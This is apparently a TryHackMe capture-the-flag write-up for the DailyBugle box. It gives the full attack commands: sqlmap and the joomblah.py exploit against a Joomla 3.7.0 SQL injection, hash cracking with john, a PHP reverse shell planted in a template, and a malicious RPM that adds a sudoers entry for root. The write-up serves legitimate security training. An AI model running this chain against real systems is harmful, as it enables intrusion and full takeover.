DailyBugle is a CTF Linux box with difficulty rated as “medium” on the TryHackMe platform. The machine covers Joomla 3.7.0 SQL injection vulnerability and privilege escalation using yum.
Table of Content
EnumerationDiscovering administrator directories using robots.txt Enumerating site using joomscan Discovering SQL injection flaw in the current installation
ExploitationExploiting Joomla v 3.7.0 via SQLi in com_fields Cracking Joomla administrator hashes using john Modifying template to input PHP reverse shell code
Privilege EscalationDiscovering other user’s credentials in the configuration file Elevating privileges using yum
Let’s deep dive into this.
The dedicated IP address of the machine is 10.10.91.172. We’ll run a nmap scan on this machine’s IP.nmap -sV -sC 10.10.91.172 -Pn
We discovered the existence of a robots file that has an administrator directory.
Upon opening this directory we found out that an instance of Joomla was running on this website.
Thus, we ran joomscan on this website and discovered the version 3.7.0 being runjoomscan -u http://10.10.91.172
Right away we looked out for public exploits for this installed instance using searchsploit and discovered that version 3.7.0 was vulnerable to SQLi via the com_fields parameter.searchsploit joomla 3.7.0 searchsploit -m 42033
As exploit number 42033 told us, this sql injection vulnerability could be exploited by the following commandsqlmap -u "http://10.17.32.212/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dump-all -p list[fullordering]
However, while running this scan, it was taking way too long and so, we looked out for another script called “Joomblah.py” which is a POC for this SQLi vulnerability in Joomla v3.7.0. So we downloaded this script, ran and found credentials!wget https://raw.githubusercontent.com/XiphosResearch/exploits/master/Joomblah/joomblah.py python2.7 joomblah.py http://10.10.91.172
We had discovered the hash but to know it’s type we googled it up and found it was
Thus we saved this hash in a file and used john to crack themcat hash john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash
We see we have received clear text credentials. We logged in to the admin panel using this and can see a dashboard now!
Like with any other CMS, Joomla also has templates that are running on PHP, therefore, right away we copied the php-reverse-shell.php code in the template file and clicked on template preview. Before launching template preview we also set up a netcat listenernc -nlvp 1234
On our listener we see a shell popped up!
Now that we have a working TTY on the victim box, we started looking for ways to escalate privileges. We checked the sudoers file but nothing was found.
After a quick system check and looking at the website’s files, we found a configuration file that had credentials of a database. root user had the password: nv5uz9r3ZEDzVjNucd /var/www/html cat configuration.php
Now, we tried to login into another existing user jjameson using this password and it worked! We immediately spawned a stable teletype using python. Thereafter, we looked into the sudoers file and found yum in the entries.su jjameson python -c 'import pty;pty.spawn("/bin/bash")' sudo -l
Referring to gtfobins post here we can escalate our privileges by creating our custom RPM executable. For this we need rpm, fpm to be installed first. Thereafter, we’ll copy a command into a shell script. This echo command simply adds my user jjameson into the sudoers file so that any command can be run as root. This would be our payload. Then we create an rpm package using fpm package.apt install rpm gem install fpm echo 'echo "jjameson ALL=(root) NOPASSWD:ALL" >> /etc/sudoers' > my.sh fpm -n root -s dir -t rpm -a all --before-install my.sh . python3 -m http.server 80
Now all that’s left to do was to copy this file into /tmp directory on the victim’s box.cd /tmp wget http://10.17.32.212/root-1.0-1.noarch.rpm
So, we downloaded it and ran using yum localinstall command. It ran successfully! We ran bash shell as sudo and as expected jjameson (my user) ran it as root and thus privileges were escalated! Finally, we read the congratulatory flag!sudo yum localinstall -y root-1.0-1.noarch.rpm sudo bash cd /root cat root.txt
Hence, this is how we root this box. Kudos to the author on creating a beginner-friendly box that focuses on real life and commonly found vulnerabilities. Thanks for reading!
Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contact here